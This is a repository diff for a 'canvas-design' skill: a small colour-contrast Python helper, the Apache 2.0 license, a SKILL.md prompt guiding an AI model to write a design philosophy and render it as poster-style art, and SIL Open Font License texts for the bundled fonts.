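    """Approximate relative luminance (0..1) using BT.709 channel weights."""
    h = hex_color.lstrip("#")
    r, g, b = (int(h[i:i + 2], 16) / 255 for i in (0, 2, 4))
    return 0.2126 * r + 0.7152 * g + 0.0722 * b

def text_color_for(background_hex: str) -> str:
    """Return the brand text color with better contrast on this background."""
    return LIGHT if _luminance(background_hex) < 0.5 else DARK

print(text_color_for("#141413"))  # dark background -> light text
print(text_color_for("#e8e6dc"))  # light gray background -> dark text
```

The same rule extends naturally to the accent colors, which sit near the middle of the luminance range and therefore benefit most from an explicit contrast check.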
202
skills/canvas-design/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

1. Definitions.

"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.

"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.

"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.

"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.

"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.

"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.

"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).

"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.

"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."

"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.

2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.

3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.

4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:

(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and

(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and

(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and

(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.

You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.

5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.

6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.

7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.

8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.

9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.

END OF TERMS AND CONDITIONS

APPENDIX: How to apply the Apache License to your work.

To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.

Copyright [yyyy] [name of copyright owner]

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
130
skills/canvas-design/SKILL.md
Normal file
@@ -0,0 +1,130 @@
---
name: canvas-design
description: Create beautiful visual art in .png and .pdf documents using design philosophy. You should use this skill when the user asks to create a poster, piece of art, design, or other static piece. Create original visual designs, never copying existing artists' work, to avoid copyright violations.
license: Complete terms in LICENSE.txt
---

These are instructions for creating design philosophies - aesthetic movements that are then EXPRESSED VISUALLY. Output only .md files, .pdf files, and .png files.

Complete this in two steps:
1. Design Philosophy Creation (.md file)
2. Express by creating it on a canvas (.pdf file or .png file)

First, undertake this task:

## DESIGN PHILOSOPHY CREATION

To begin, create a VISUAL PHILOSOPHY (not layouts or templates) that will be interpreted through:
- Form, space, color, composition
- Images, graphics, shapes, patterns
- Minimal text as visual accent

### THE CRITICAL UNDERSTANDING
- What is received: Some subtle input or instructions from the user that should be taken into account and used as a foundation; it should not constrain creative freedom.
- What is created: A design philosophy/aesthetic movement.
- What happens next: The same version then receives the philosophy and EXPRESSES IT VISUALLY - creating artifacts that are 90% visual design, 10% essential text.

Consider this approach:
- Write a manifesto for an art movement
- The next phase involves making the artwork

The philosophy must emphasize: Visual expression. Spatial communication. Artistic interpretation. Minimal words.

### HOW TO GENERATE A VISUAL PHILOSOPHY

**Name the movement** (1-2 words): "Brutalist Joy" / "Chromatic Silence" / "Metabolist Dreams"

**Articulate the philosophy** (4-6 paragraphs - concise but complete):

To capture the VISUAL essence, express how the philosophy manifests through:
- Space and form
- Color and material
- Scale and rhythm
- Composition and balance
- Visual hierarchy

**CRITICAL GUIDELINES:**
- **Avoid redundancy**: Each design aspect should be mentioned once. Avoid repeating points about color theory, spatial relationships, or typographic principles unless adding new depth.
- **Emphasize craftsmanship REPEATEDLY**: The philosophy MUST stress multiple times that the final work should appear as though it took countless hours to create, was labored over with care, and comes from someone at the absolute top of their field. This framing is essential - repeat phrases like "meticulously crafted," "the product of deep expertise," "painstaking attention," "master-level execution."
- **Leave creative space**: Remain specific about the aesthetic direction, but concise enough that the next Claude has room to make interpretive choices, also at an extremely high level of craftsmanship.

The philosophy must guide the next version to express ideas VISUALLY, not through text. Information lives in design, not paragraphs.

### PHILOSOPHY EXAMPLES

**"Concrete Poetry"**
Philosophy: Communication through monumental form and bold geometry.
Visual expression: Massive color blocks, sculptural typography (huge single words, tiny labels), Brutalist spatial divisions, Polish poster energy meets Le Corbusier. Ideas expressed through visual weight and spatial tension, not explanation. Text as rare, powerful gesture - never paragraphs, only essential words integrated into the visual architecture. Every element placed with the precision of a master craftsman.

**"Chromatic Language"**
Philosophy: Color as the primary information system.
Visual expression: Geometric precision where color zones create meaning. Typography minimal - small sans-serif labels letting chromatic fields communicate. Think Josef Albers' interaction meets data visualization. Information encoded spatially and chromatically. Words only to anchor what color already shows. The result of painstaking chromatic calibration.

**"Analog Meditation"**
Philosophy: Quiet visual contemplation through texture and breathing room.
Visual expression: Paper grain, ink bleeds, vast negative space. Photography and illustration dominate. Typography whispered (small, restrained, serving the visual). Japanese photobook aesthetic. Images breathe across pages. Text appears sparingly - short phrases, never explanatory blocks. Each composition balanced with the care of a meditation practice.

**"Organic Systems"**
Philosophy: Natural clustering and modular growth patterns.
Visual expression: Rounded forms, organic arrangements, color from nature through architecture. Information shown through visual diagrams, spatial relationships, iconography. Text only for key labels floating in space. The composition tells the story through expert spatial orchestration.

**"Geometric Silence"**
Philosophy: Pure order and restraint.
Visual expression: Grid-based precision, bold photography or stark graphics, dramatic negative space. Typography precise but minimal - small essential text, large quiet zones. Swiss formalism meets Brutalist material honesty. Structure communicates, not words. Every alignment the work of countless refinements.

*These are condensed examples. The actual design philosophy should be 4-6 substantial paragraphs.*

### ESSENTIAL PRINCIPLES
- **VISUAL PHILOSOPHY**: Create an aesthetic worldview to be expressed through design
- **MINIMAL TEXT**: Always emphasize that text is sparse, essential-only, integrated as a visual element - never lengthy
- **SPATIAL EXPRESSION**: Ideas communicate through space, form, color, composition - not paragraphs
- **ARTISTIC FREEDOM**: The next Claude interprets the philosophy visually - provide creative room
- **PURE DESIGN**: This is about making ART OBJECTS, not documents with decoration
- **EXPERT CRAFTSMANSHIP**: Repeatedly emphasize the final work must look meticulously crafted, labored over with care, the product of countless hours by someone at the top of their field

**The design philosophy should be 4-6 paragraphs long.** Fill it with poetic design philosophy that brings together the core vision. Avoid repeating the same points. Keep the design philosophy generic, without mentioning the intention of the art, as if it could be used anywhere. Output the design philosophy as a .md file.

---

## DEDUCING THE SUBTLE REFERENCE

**CRITICAL STEP**: Before creating the canvas, identify the subtle conceptual thread from the original request.

**THE ESSENTIAL PRINCIPLE**:
The topic is a **subtle, niche reference embedded within the art itself** - not always literal, always sophisticated. Someone familiar with the subject should feel it intuitively, while others simply experience a masterful abstract composition. The design philosophy provides the aesthetic language. The deduced topic provides the soul - the quiet conceptual DNA woven invisibly into form, color, and composition.

This is **VERY IMPORTANT**: The reference must be refined so it enhances the work's depth without announcing itself. Think like a jazz musician quoting another song - only those who know will catch it, but everyone appreciates the music.

---

## CANVAS CREATION

With both the philosophy and the conceptual framework established, express it on a canvas. Take a moment to gather thoughts and clear the mind. Use the design philosophy created and the instructions below to craft a masterpiece, embodying all aspects of the philosophy with expert craftsmanship.

**IMPORTANT**: For any type of content, even if the user requests something for a movie/game/book, the approach should still be sophisticated. Never lose sight of the idea that this should be art, not something cartoony or amateur.

To create museum- or magazine-quality work, use the design philosophy as the foundation. Create a single-page, highly visual, design-forward PDF or PNG output (unless asked for more pages). Generally use repeating patterns and perfect shapes. Treat the abstract philosophical design as if it were a scientific bible, borrowing the visual language of systematic observation—dense accumulation of marks, repeated elements, or layered patterns that build meaning through patient repetition and reward sustained viewing. Add sparse, clinical typography and systematic reference markers that suggest this could be a diagram from an imaginary discipline, treating the invisible subject with the same reverence typically reserved for documenting observable phenomena. Anchor the piece with simple phrase(s) or details positioned subtly, using a limited color palette that feels intentional and cohesive. Embrace the paradox of using analytical visual language to express ideas about human experience: the result should feel like an artifact that proves something ephemeral can be studied, mapped, and understood through careful attention. This is true art.

**Text as a contextual element**: Text is always minimal and visual-first, but let context guide whether that means whisper-quiet labels or bold typographic gestures. A punk venue poster might have larger, more aggressive type than a minimalist ceramics studio identity. Most of the time, the font should be thin. All use of fonts must be design-forward and prioritize visual communication. Regardless of text scale, nothing falls off the page and nothing overlaps. Every element must be contained within the canvas boundaries with proper margins. Check carefully that all text, graphics, and visual elements have breathing room and clear separation. This is non-negotiable for professional execution. **IMPORTANT: Use different fonts if writing text. Search the `./canvas-fonts` directory. Regardless of approach, sophistication is non-negotiable.**

Download and use whatever fonts are needed to make this a reality. Get creative by making the typography actually part of the art itself -- if the art is abstract, bring the font onto the canvas, not typeset digitally.
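A minimal sketch of the font-discovery step described above, assuming the `./canvas-fonts` layout shipped in this repo; the helper name is illustrative and the registration step depends on whichever drawing library is used.

```python
# Hypothetical helper: enumerate the TrueType fonts bundled under
# ./canvas-fonts so a rendering library can register them. Only the
# directory name comes from this repo; the function name is made up.
from pathlib import Path

def list_canvas_fonts(font_dir: str = "./canvas-fonts") -> list[str]:
    """Return sorted paths of every .ttf font found in font_dir."""
    return sorted(str(p) for p in Path(font_dir).glob("*.ttf"))
```

A renderer would then pass each returned path to its own font-loading call (for example, an `ImageFont.truetype(...)`-style API) before drawing text onto the canvas.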
To push boundaries, follow design instinct/intuition while using the philosophy as a guiding principle. Embrace ultimate design freedom and choice. Push aesthetics and design to the frontier.

**CRITICAL**: To achieve human-crafted quality (not AI-generated), create work that looks like it took countless hours. Make it appear as though someone at the absolute top of their field labored over every detail with painstaking care. Ensure the composition, spacing, color choices, typography - everything screams expert-level craftsmanship. Double-check that nothing overlaps, formatting is flawless, every detail perfect. Create something that could be shown to people to prove expertise and rank as undeniably impressive.

Output the final result as a single, downloadable .pdf or .png file, alongside the design philosophy used as a .md file.

---

## FINAL STEP

**IMPORTANT**: The user ALREADY said "It isn't perfect enough. It must be pristine, a masterpiece of craftsmanship, as if it were about to be displayed in a museum."

**CRITICAL**: To refine the work, avoid adding more graphics; instead refine what has been created and make it extremely crisp, respecting the design philosophy and the principles of minimalism entirely. Rather than adding a fun filter or refactoring a font, consider how to make the existing composition more cohesive with the art. If the instinct is to call a new function or draw a new shape, STOP and instead ask: "How can I make what's already here more of a piece of art?"

Take a second pass. Go back to the code and refine/polish further to make this a philosophically designed masterpiece.

## MULTI-PAGE OPTION

To create additional pages when requested, create more creative pages along the same lines as the design philosophy, but distinctly different as well. Bundle those pages in the same .pdf or as multiple .pngs. Treat the first page as just a single page in a whole coffee table book waiting to be filled. Make the next pages unique twists and memories of the original. Have them almost tell a story in a very tasteful way. Exercise full creative freedom.
93
skills/canvas-design/canvas-fonts/ArsenalSC-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2012 The Arsenal Project Authors (andrij.design@gmail.com)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/ArsenalSC-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/BigShoulders-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/BigShoulders-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2019 The Big Shoulders Project Authors (https://github.com/xotypeco/big_shoulders)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/BigShoulders-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Boldonse-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2024 The Boldonse Project Authors (https://github.com/googlefonts/boldonse)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/Boldonse-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/BricolageGrotesque-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/BricolageGrotesque-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2022 The Bricolage Grotesque Project Authors (https://github.com/ateliertriay/bricolage)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org


-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
